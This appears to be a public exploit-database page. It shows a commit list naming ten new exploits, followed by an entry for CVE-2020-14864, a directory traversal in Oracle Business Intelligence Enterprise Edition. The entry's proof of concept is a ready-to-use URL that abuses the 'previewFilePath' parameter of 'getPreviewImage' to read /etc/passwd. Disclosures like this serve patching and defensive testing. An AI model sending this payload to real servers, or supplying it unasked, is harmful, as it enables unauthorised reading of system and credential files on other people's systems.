e178c80d85
10 changes to exploits/shellcodes PackageKit < 1.1.13 - File Existence Disclosure aptdaemon < 1.1.1 - File Existence Disclosure Blueman < 2.1.4 - Local Privilege Escalation Exploit - EPSON 1.124 - 'seksmdb.exe' Unquoted Service Path Program Access Controller v1.2.0.0 - 'PACService.exe' Unquoted Service Path Prey 1.9.6 - _CronService_ Unquoted Service Path IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated) CSE Bookstore 1.0 - Authentication Bypass Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion
15 lines
No EOL
1 KiB
Text
15 lines
No EOL
1 KiB
Text
# Exploit Title: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion
|
|
# Date: 2020-10-27
|
|
# Exploit Author: Ivo Palazzolo (@palaziv)
|
|
# Reference: https://www.oracle.com/security-alerts/cpuoct2020.html
|
|
# Vendor Homepage: https://www.oracle.com
|
|
# Software Link: https://www.oracle.com/middleware/technologies/bi-enterprise-edition-downloads.html
|
|
# Version: 5.5.0.0.0, 12.2.1.3.0, 12.2.1.4.0
|
|
# Tested on: SUSE Linux Enterprise Server
|
|
# CVE: CVE-2020-14864
|
|
|
|
# Description
|
|
A Directory Traversal vulnerability has been discovered in the 'getPreviewImage' function of Oracle Business Intelligence Enterprise Edition. The 'getPreviewImage' function is used to get a preview image of a previously uploaded theme logo. By manipulating the 'previewFilePath' URL parameter an attacker with access to the administration interface is able to read arbitrary system files.
|
|
|
|
# PoC
|
|
https://TARGET/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd |